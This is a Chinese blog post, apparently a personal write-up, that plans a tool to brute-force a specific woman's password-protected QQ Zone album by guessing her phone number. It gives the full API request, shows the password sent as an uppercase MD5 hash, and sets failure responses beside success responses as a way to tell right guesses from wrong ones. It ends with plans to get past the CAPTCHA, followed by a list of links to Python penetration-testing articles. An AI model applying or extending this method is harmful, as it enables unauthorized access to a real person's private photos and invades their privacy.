计划写一个获取qq空间加密相册的工具。

分析:

她的相册密码是手机号,先写一个生成手机号的脚本

空间有她之前的手机号,那么她现在的手机号也极有可能是一样的运营商,比如移动(缩小密码范围)

自己新建一个加密相册,通过工具测试,看看成功或失败的response内容的差别。

扩展工具,可以进行多种密码类型的组合

记录:

https://h5.qzone.qq.com/proxy/domain/photo.qzone.qq.com/fcgi-bin/cgi_list_photo

?g_tk=238297171

&callback=shine3_Callback

&t=247612204

&mode=0

&idcNum=4

&hostUin=xxx9883609

&topicId=V12sTtCU1D7iEU

&noTopic=0

&uin=xxx3633125

&pageStart=0

&pageNum=1

&skipCmtCount=0

&singleurl=1

&batchId=

&notice=0

&appid=4

&inCharset=utf-8

&outCharset=utf-8

&source=qzone

&plat=qzone

&outstyle=json

&format=jsonp

&json_esc=1

&question=%E6%89%8B%E6%9C%BA

&answer=E10ADC3949BA59ABBE56E057F20F883E

&callbackFun=shine3

&_=1510406853362

结果:

shine3_Callback({

	"code":-10805,

	"subcode":-10805,

	"message":"对不起,回答错误",

	"notice":0,

	"time":1510406993,

	"tips":"2A93-540",

	"data":{

   "priv" : 5,

   "question" : "手机",

   "t" : "247612204"

}

}

);

&question=%E6%89%8B%E6%9C%BA (手机)

&answer=E10ADC3949BA59ABBE56E057F20F883E(123456)

answer是md5加密

工具:http://www.cmd5.com/

输入正确的密码,得到:adadacb7c2658e921758d3c4bf90765d

转大写:https://bigtosmall.51240.com/

ADADACB7C2658E921758D3C4BF90765D

替换之前错误的,返回结果:

shine3_Callback({

	"code":0,

	"subcode":0,

	"message":"",

	"default":0,

	"data":

{

   "limit" : 0,

   "photoList" : [

      {

         "batchId" : "1510404687051",

         "browser" : 0,

         "cameratype" : " ",

         "cp_flag" : false,

         "cp_x" : 540,

         "cp_y" : 822,

         "desc" : "",

         "exif" : {

            "exposureCompensation" : "",

            "exposureMode" : "",

            "exposureProgram" : "",

            "exposureTime" : "",

            "flash" : "",

            "fnumber" : "",

            "focalLength" : "",

            "iso" : "",

            "lensModel" : "",

            "make" : "",

            "meteringMode" : "",

            "model" : "",

            "originalTime" : ""

         },

         "forum" : 0,

         "frameno" : 0,

         "height" : 1920,

         "id" : 0,

         "is_video" : false,

         "is_weixin_mode" : 0,

         "ismultiup" : 0,

         "lloc" : "NDR02be2ojjyBloPIfkr8gAAAAAAAAA!",

         "modifytime" : 1510404664,

         "name" : "2017-11-11",

         "origin" : 0,

         "origin_upload" : 0,

         "origin_url" : "",

         "owner" : "xxx9883609",

         "ownername" : "xxx9883609",

         "photocubage" : 16930,

         "phototype" : 17,

         "picmark_flag" : 0,

         "picrefer" : 66,

         "platformId" : 52,

         "platformSubId" : 2,

         "poiName" : "",

         "pre" : "http:\/\/b242.photo.store.qq.com\/psbe?\/V12sTtCU1D7iEU\/oAaS.Z7tyAdknNEKQ4Q0GA3.hQnCs9Y0Qj1oL6LMm.h*f98*I9KDIQPU7uIDVz7i\/a\/dPIAAAAAAAAA&bo=OASABwAAAAARB4s!",

         "raw" : "",

         "raw_upload" : 0,

         "rawshoottime" : "2017-11-08 14:24:07",

         "shoottime" : "2017-11-08 ",

         "shorturl" : "",

         "sloc" : "NDR02be2ojjyBloPIfkr8gAAAAAAAAA!",

         "tag" : "",

         "uploadtime" : "2017-11-11 20:51:04",

         "url" : "http:\/\/b242.photo.store.qq.com\/psbe?\/V12sTtCU1D7iEU\/oAaS.Z7tyAdknNEKQ4Q0GA3.hQnCs9Y0Qj1oL6LMm.h*f98*I9KDIQPU7uIDVz7i\/b\/dPIAAAAAAAAA&bo=OASABwAAAAARB4s!",

         "width" : 1080,

         "yurl" : 0

      }

   ],

   "t" : "247612204",

   "topic" : {

      "bitmap" : "10000010",

      "browser" : 0,

      "classid" : 106,

      "comment" : 1,

      "cover_id" : "NDR02be2ojjyBloPIfkr8gAAAAAAAAA!",

      "createtime" : 1510404663,

      "desc" : "",

      "handset" : 0,

      "id" : "V12sTtCU1D7iEU",

      "is_share_album" : 0,

      "lastuploadtime" : 1510404703,

      "modifytime" : 1510406803,

      "name" : "2017.11.11",

      "ownerName" : "xxx9883609",

      "ownerUin" : "xxx9883609",

      "pre" : "http:\/\/b242.photo.store.qq.com\/psbe?\/V12sTtCU1D7iEU\/5RnntLai7oEQE6i*OnXeN8nUGyyqEZCHil*JmmZ1rCnbXCVtjR9Cg8QqrISTQ3Wt\/a\/dPIAAAAAAAAA",

      "priv" : 5,

      "pypriv" : 3,

      "share_album_owner" : 0,

      "total" : 10,

      "url" : "http:\/\/b242.photo.store.qq.com\/psbe?\/V12sTtCU1D7iEU\/5RnntLai7oEQE6i*OnXeN8nUGyyqEZCHil*JmmZ1rCnbXCVtjR9Cg8QqrISTQ3Wt\/b\/dPIAAAAAAAAA",

      "viewtype" : 2

返回正确的结果了。

我们可以通过shine3_Callback的code 的值判断密码的正误。

当然,现实怎么会如此美好,当我尝试多次后发现有验证码,腾讯考虑的真TMD周到!

关于怎么获取验证码还需要研究下。待续。。。

python渗透的更多相关文章

  1. Python渗透测试工具合集

    摘自:http://www.freebuf.com/tools/94777.html 如果你热爱漏洞研究.逆向工程或者渗透测试,我强烈推荐你使用 Python 作为编程语言.它包含大量实用的库和工具, ...

  2. python渗透测试工具集合

    作者:一起学习Python 原文链接:https://zhuanlan.zhihu.com/p/21803985 著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 在进行漏洞研究. ...

  3. python渗透测试工具包

    网络 Scapy, Scapy3k: 发送,嗅探,分析和伪造网络数据包.可用作交互式包处理程序或单独作为一个库.pypcap, Pcapy, pylibpcap: 几个不同 libpcap 捆绑的py ...

  4. Python渗透测试工具库

    漏洞及渗透练习平台 WebGoat漏洞练习平台: https://github.com/WebGoat/WebGoat webgoat-legacy漏洞练习平台: https://github.com ...

  5. python渗透库大集合

    l Scapy:一款强大的交互式数据报分析工具,可用作发送.嗅探.解析和伪造网络数据包. l pypcap.Pcapy和pylibpcap:配合libpcap一起使用的数据包捕获模块 l libdne ...

  6. Python 渗透测试编程技术方法与实践 ------全书整理

    1.整个渗透测试的工作阶段 ( 1 )前期与客户的交流阶段.( 2 )情报的收集阶段.( 3 )威胁建模阶段.( 4 )漏洞分析阶段.( 5 )漏洞利用阶段.( 6 )后渗透攻击阶段.( 7 )报告阶 ...

  7. python渗透测试入门——基础的网络编程工具

    <Python黑帽子--黑客与渗透测试编程之道学习>这本书是我在学习安全的过程中发现的在我看来十分优秀的一本书,业内也拥有很高的评价,所以在这里将自己的学习内容分享出来. 1.基础的网络编 ...

  8. 我的python渗透测试工具箱之自制netcat

    此工具的目的是实现在目标主机上的文件传输,控制命令行的功能,主要逻辑依靠python的subprocess模块.`sys`模块和`getopt`模块. 知识准备 studin和studut studi ...

  9. 我的python渗透测试工具之主机嗅探

    嗅探工具的主要目标是基于UDP发现目标网络中的存活主机,选择UDP的原因是UDP访问过程开销小. 由于很多的操作系统在处理UDP端口的闭合时都会存在一个共性,我们也正是利用这个共性来开展确定此IP上是 ...

随机推荐

  1. 【Luogu4512】多项式除法(FFT)

    题面 洛谷 题解 模板题... 我直接蒯我写的东西... 这个除法是带余除法,所以并不能直接求逆解决. 要求的就是给定两个多项式\(A(x),B(x)\),其项数为\(n,m\) 求解一个\(n-m\ ...

  2. [BZOJ5248] 2018九省联考 D1T1 一双木棋 | 博弈论 状压DP

    题面 菲菲和牛牛在一块\(n\)行\(m\)列的棋盘上下棋,菲菲执黑棋先手,牛牛执白棋后手. 棋局开始时,棋盘上没有任何棋子,两人轮流在格子上落子,直到填满棋盘时结束. 落子的规则是:一个格子可以落子 ...

  3. SharePoint 2013 批量导入、删除帐号

    删除一个group里所有的帐号: cls ########################### # "Enter the site URL here" $SITEURL = &q ...

  4. 对STM32库函数中 assert 函数的认知

    > 本段代码取自 <stm32f4xx_gpio.c> > 可以看出进入函数第一件事就是做 assert 输入参数检查,参数合法后,根据参数做相应操作 /** * @brief ...

  5. luogu3385 负环 (spfa)

    我在做spfa的时候,如果有一个点被更新了超过N次,证明这个图里是有负环的. (神TM输出YE5和N0) #include<bits/stdc++.h> #define pa pair&l ...

  6. [学习笔记]Dsu On Tree

    [dsu on tree][学习笔记] - Candy? - 博客园 题单: 也称:树上启发式合并 可以解决绝大部分不带修改的离线询问的子树查询问题 流程: 1.重链剖分找重儿子 2.sol:全局用桶 ...

  7. python 面向对象之多态

    多态是什么? 用一句话来概括下,多态就是同一操作(方法)作用于不同的对象时,可以有不同的解释,产生不同的执行结果. #!/usr/bin/env python # -*- coding: utf-8 ...

  8. bottle框架剖析

    bottle框架剖析 使用 源码分析 一.使用 大致有以下几部分 quick start request routing generate contents request Data template ...

  9. solr6.4.2之webservice兼容升级

    摘要:这次solr底层升级是一次比较大的升级.从底层搜索引擎 solr4.8 升级到 solr6.4.2,由于solr底层从6.x开始以来的jdk必须指定为1.8,而且很多内部实现类都已经废弃或者干脆 ...

  10. Redis危险命令重命名、禁用

    Redis的危险命令主要有: flushdb,清空数据库 flushall,清空所有记录,数据库 config,客户端连接后可配置服务器 keys,客户端连接后可查看所有存在的键 作为服务端的redi ...